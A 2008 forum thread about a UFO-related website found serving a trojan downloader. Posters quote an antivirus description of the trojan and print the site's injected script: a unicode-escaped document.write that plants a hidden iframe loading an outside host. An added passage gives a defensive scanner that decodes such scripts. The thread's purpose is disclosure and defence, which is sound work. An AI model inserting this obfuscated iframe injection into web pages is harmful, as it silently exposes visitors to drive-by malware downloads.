I just went to Bob Lazar's site and got a virus...


posted on Apr, 9 2008 @ 03:32 AM
I went to his site boblazar.com just to check if the password still didn't work. Well you don't need a password anymore, but my virus scanner started popping up with infected files from the site.

Do you think it's the owners of the site that installed a script or exploit on the site or is it some kind of government spyware or cookie or something tracking people who look into the subject?



posted on Apr, 9 2008 @ 04:24 AM
reply to post by Diplomat
 


Hmmm, I'm not game enough to go there to check!
Perhaps one of the techs or IT members here could check it out and post a response?



posted on Apr, 9 2008 @ 04:33 AM
Trojan-Downloader.JS.Psyme.gy




Technical details
This Trojan downloads other programs via the Internet and launches them on the victim machine without the user’s knowledge or consent. The Trojan is a JavaScript script which is built into HTML pages.
It is 17,002 bytes in size.

Payload
Once launched, the Trojan injects its code into the memory of processes which have the following unique identifiers in the system registry:

The Trojan then attempts to connect to the Internet and download a file called "file.php" from the following address:

my...***l.com/file.pho
(At the time of writing, this link was not working.)

This file will be saved to the C:\ root directory as "sys%rnd%.exe" (%rnd% is a random four digit number):

c:\sys%rnd%.exe
The downloaded file is then launched for execution.



Removal instructions
If your computer does not have an up-to-date antivirus, or does not have an antivirus solution at all, follow the instructions below to delete the malicious program:

Delete the original Trojan file (the location will depend on how the program originally penetrated the victim machine).
Delete the following file:
c:\sys%rnd%.exe
Update your antivirus databases and perform a full scan of the computer

www.viruslist.com...

The virus is downloaded once you open this page
http : // www. boblazar. com/ closed/ index. html

I took a look at the source code:

The issue is this one:

< script type ="text/_javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u007 4\u0070\u003a\u002f\u002f\u0074\u006f\u0070\u0031\u0030\u0030\u002d\u0063\u006f\u0075\u006e\u0074\u0065\u0072\u002e\u0063\u006f\ u006d\u002f\u0074\u006f\u0070\u0031\u0030\u0030\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0022\u0020\u0073\u00 74\u0079\u006c\u0065\u003d\u0022\u0076\u0069\u0073\u0069\u0062\u0069\u006c\u0069\u0074\u0079\u003a\u0020\u0068\u0069\u0064\u0064 u0065\u006e\u003b\u0020\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u0020\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0 069\u0066\u0072\u0061\u006d\u0065\u003e\u0020')
< / script >

This is an encoded iframe tag: with the iframe tag, you can embed a page in another one, even from another website.
But it may happen that a webmaster (a HECK of a webmaster) is unaware of it.


Now, changing the "document.write" instruction to "alert", this is the result:

If you click here Google result
then you get this result:



If I'm correct, there are some web page generators which automatically embed the malicious code in the pages that they build.

See also:
Massive Web Server Hacks (”iFrame Attacks”) - Now Extended To TYPO3
I've sent an email to a friend in order to bring the issue to Bob Lazar's attention.
Thanks for sharing this information, diplomat.


[edit on 10/4/2008 by internos]
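
The check described in the post above (reading the escaped string instead of letting the browser run it), as an added example that is not part of the original thread: a Node.js script that decodes `\uXXXX` escapes in `document.write()` arguments without executing anything and reports iframes hidden from the visitor. The sample page, the `example.invalid` host and all function names are constructed for illustration.

```javascript
// Added example (not from the thread): find document.write() calls whose
// argument is \uXXXX-escaped, decode them statically, and flag hidden iframes.
// Nothing from the scanned page is evaluated.

// Decode \uXXXX escapes, tolerating whitespace left by forum line wrapping.
function decodeUnicodeEscapes(s) {
  return s.replace(/\\\s*u\s*([0-9a-fA-F](?:\s*[0-9a-fA-F]){3})/g, (_, hex) =>
    String.fromCharCode(parseInt(hex.replace(/\s+/g, ''), 16)));
}

// Return one finding per <iframe> tag written by document.write().
function findHiddenIframes(html) {
  const findings = [];
  const writeCall = /document\.write\s*\(\s*(['"])([\s\S]*?)\1\s*\)/g;
  for (const call of html.matchAll(writeCall)) {
    const decoded = decodeUnicodeEscapes(call[2]);
    for (const tag of decoded.matchAll(/<iframe\b[^>]*>/gi)) {
      const srcMatch = /\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(tag[0]);
      findings.push({
        src: srcMatch ? srcMatch[1] : null,
        // Invisible to the visitor: CSS hiding or zero-sized frame.
        hidden: /visibility\s*:\s*hidden|display\s*:\s*none/i.test(tag[0]) ||
          /\b(?:width|height)\s*=\s*["']?0\b/i.test(tag[0]),
        obfuscated: decoded !== call[2],
      });
    }
  }
  return findings;
}

// Constructed sample input: a page with an escaped hidden iframe pointing at
// a placeholder host, plus one escape split by whitespace ("\u00 3d").
const toEscapes = (s) => [...s].map(
  (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0')).join('');
const SAMPLE_TAG = '<iframe src="http://counter.example.invalid/index.php" ' +
  'style="visibility: hidden; display: none"></iframe>';
const SAMPLE_PAGE = '<html><body><p>Welcome</p><script type="text/javascript">' +
  "document.write('" + toEscapes(SAMPLE_TAG).replace('u003d', 'u00 3d') + "')" +
  '</script></body></html>';

console.log(JSON.stringify(findHiddenIframes(SAMPLE_PAGE), null, 2));
```

A finding with both `hidden` and `obfuscated` set is the pattern shown in the post: an iframe the visitor never sees, written by a script whose argument hides the tag from a plain-text search of the page source.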



posted on Apr, 9 2008 @ 04:32 PM
Heh, I feel for you but, I employed United Nuclear and
all I got was this lousy freakin' T-shirt!

Oh before I forget, element 115 no way as good as The
Fifth Element, but we're sending someone in to negotiate.



